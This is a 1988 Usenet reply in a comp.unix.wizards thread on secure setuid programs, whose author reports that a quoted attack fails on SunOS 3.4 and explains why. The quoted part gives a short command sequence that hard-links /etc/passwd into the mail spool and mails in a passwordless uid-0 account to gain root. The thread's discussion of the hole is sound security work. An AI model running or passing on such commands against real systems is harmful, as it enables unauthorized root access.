Path: utzoo!mnetor!uunet!ncc!alberta!ubc-cs!fornax!stevec
From: stevec@fornax.UUCP (Steve Cumming)
Newsgroups: comp.unix.wizards
Subject: Re: Guide to writing secure setuid programs?
Message-ID: <469@fornax.UUCP>
Date: 28 Mar 88 18:42:32 GMT
References: <181@wsccs.UUCP> <722@rivm05.UUCP> <1037@woton.UUCP> <386@vsi.UUCP> <347@wsccs.UUCP>
Organization: School of Computing Science, SFU, Burnaby, B.C. Canada
Lines: 28
Summary: Suns mail is smarter...

In article <347@wsccs.UUCP>, terry@wsccs.UUCP (terry) writes:
>
>	[ remarks on previous articles suppressed]
> 
> 	1) if /usr/spool/mail is writeable and on the same device as /etc:
> 
> 		$ ln /etc/passwd /usr/spool/mail/fred
> 		$ echo "sneak::0:1:A hacker:/:/bin/sh" | mail fred
> 		$ su fred
> 		#

I tried this out on a Sun running 3.4. It don't work. 
Mail is evidently smart enough to check for the existence of 
the addressee, either locally or through the Yellow Pages.

I don't see as it matters whether /etc/passwd and the mail
directory are on the same file system.

Moreover, if mail doesn't run setuid, which on our site it doesn't,
then it has no special priveleges, and can't write to a soft or
hard link to a protected file.

Steve Cumming
Systems worker
School of Computing Science
SFU

ubc-vision!fornax!stevec